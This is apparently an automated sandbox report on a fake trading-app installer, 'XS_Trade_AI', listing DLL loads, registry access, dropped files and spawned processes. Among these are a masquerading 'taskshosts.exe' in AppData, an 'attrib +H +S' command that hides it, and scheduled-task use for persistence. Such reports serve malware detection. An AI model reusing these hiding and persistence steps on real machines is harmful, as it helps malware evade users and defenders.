Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe | Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: winhttpcom.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: mlang.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\attrib.exe | Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\attrib.exe | Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Section loaded: cryptbase.dll
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: python3.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: libffi-7.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: libcrypto-1_1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: python3.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: libffi-7.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: libcrypto-1_1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpWindow found: window name: TMainFormJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: XS_Trade_AI-newest_release_.exeStatic file information: File size 2528268 > 1048576
      Source: XS_Trade_AI-newest_release_.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: D:\a\1\b\bin\win32\_multiprocessing.pdb source: taskshosts.exe, 0000000F.00000003.1928345378.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016209279.000000000124E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\pyexpat.pdb source: taskshosts.exe, 0000000F.00000003.1930484228.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2018746592.000000000124F000.00000004.00000020.00020000.00000000.sdmp, pyexpat.pyd.19.dr
      Source: Binary string: D:\a\1\b\bin\win32\_uuid.pdb source: taskshosts.exe, 0000000F.00000003.1929016414.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2017090409.000000000124E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\_decimal.pdb%% source: taskshosts.exe, 0000000F.00000003.1927843019.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2015682768.000000000124D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdbOO source: taskshosts.exe, 0000000F.00000003.1928187140.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016030196.000000000124E000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.19.dr, _lzma.pyd.15.dr
      Source: Binary string: D:\a\1\b\bin\win32\_bz2.pdb source: taskshosts.exe, 0000000F.00000003.1927458115.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2015374967.000000000124D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\select.pdb source: taskshosts.exe, 0000000F.00000003.1932655139.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2024149236.000000000124F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.15.dr
      Source: Binary string: D:\a\1\b\bin\win32\_ctypes.pdb source: taskshosts.exe, 0000000F.00000003.1927618857.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2015504389.000000000124D000.00000004.00000020.00020000.00000000.sdmp, _ctypes.pyd.15.dr
      Source: Binary string: D:\a\1\b\bin\win32\_asyncio.pdb source: taskshosts.exe, 0000000F.00000003.1927313732.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2015258110.000000000124D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\_hashlib.pdb source: taskshosts.exe, 0000000F.00000003.1928056108.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2015874093.000000000124E000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.15.dr
      Source: Binary string: D:\a\1\b\bin\win32\_decimal.pdb source: taskshosts.exe, 0000000F.00000003.1927843019.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2015682768.000000000124D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdb source: taskshosts.exe, 0000000F.00000003.1928187140.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016030196.000000000124E000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.19.dr, _lzma.pyd.15.dr
      Source: Binary string: D:\a\1\b\bin\win32\_queue.pdb source: taskshosts.exe, 0000000F.00000003.1928565694.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016688883.000000000124E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\unicodedata.pdb source: taskshosts.exe, 0000000F.00000003.1932942812.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2025854099.0000000001258000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\_overlapped.pdb source: taskshosts.exe, 0000000F.00000003.1928457624.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016484803.000000000124E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\_socket.pdb source: taskshosts.exe, 0000000F.00000003.1928682372.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016815643.000000000124E000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.19.dr, _socket.pyd.15.dr
Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe | Code function: 6_2_002F8180 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,6_2_002F8180
Source: XS_Trade_AI-newest_release_.exe | Static PE information: section name: .didata
Source: XS_Trade_AI-newest_release_.tmp.0.dr | Static PE information: section name: .didata
Source: XS_Trade_AI-newest_release_.tmp.2.dr | Static PE information: section name: .didata
Source: idp.exe.3.dr | Static PE information: section name: .sxdata
Source: libcrypto-1_1.dll.15.dr | Static PE information: section name: .00cfg
Source: libssl-1_1.dll.15.dr | Static PE information: section name: .00cfg
Source: libcrypto-1_1.dll.19.dr | Static PE information: section name: .00cfg
Source: libssl-1_1.dll.19.dr | Static PE information: section name: .00cfg
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Code function: 3_3_009FC386 pushfd ; ret 3_3_009FC3A9
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Code function: 3_3_009FC358 push esp; ret 3_3_009FC359
Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe | Code function: 6_2_003150F0 push eax; ret 6_2_0031510E
Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe | Code function: 6_2_00315470 push eax; ret 6_2_0031549E
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Code function: 15_2_0068E44C push E8006BF0h; iretd 15_2_0068E451
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Code function: 16_2_0068E44C push E8006BF0h; iretd 16_2_0068E451
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Code function: 21_2_0044AEB8 push ecx; ret 21_2_0044AEB9

      Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Process created: C:\Users\user\AppData\Local\programs\common\taskshosts.exe C:\Windows\system32\config\systemprofile\AppData\Local\programs\common\taskshosts.exe
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Process created: C:\Users\user\AppData\Local\programs\common\taskshosts.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\attrib.exe attrib +H +S "C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe"
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | File created: C:\Users\user\AppData\Local\Temp\is-342QK.tmp\DontSleep_x64.exe
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\_bz2.pyd
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\_ctypes.pyd
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\_lzma.pyd
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80162\_ssl.pyd
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\_socket.pyd
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80162\select.pyd
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80162\unicodedata.pyd
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\_queue.pyd
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80162\_socket.pyd
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80162\libssl-1_1.dll
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\VCRUNTIME140.dll
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\_multiprocessing.pyd
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\unicodedata.pyd
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\libcrypto-1_1.dll
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\_decimal.pyd
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\_overlapped.pyd
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80162\_hashlib.pyd
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80162\_bz2.pyd
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80162\_overlapped.pyd
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\libffi-7.dll
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80162\_queue.pyd
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\libssl-1_1.dll
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80162\_uuid.pyd
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\select.pyd
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\python39.dll
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80162\_ctypes.pyd
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | File created: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\DontSleep_x64.exe
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | File created: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80162\_lzma.pyd
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80162\_decimal.pyd
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | File created: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.dll
Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe | File created: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80162\python39.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | File created: C:\Users\user\AppData\Local\Temp\is-342QK.tmp\idp.dll
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80162\libffi-7.dll
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80162\libcrypto-1_1.dll
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\_ssl.pyd
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80162\pyexpat.pyd
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\_asyncio.pyd
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\pyexpat.pyd
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80162\_asyncio.pyd
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\_uuid.pyd
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80162\VCRUNTIME140.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | File created: C:\Users\user\AppData\Local\Temp\is-342QK.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\_hashlib.pyd
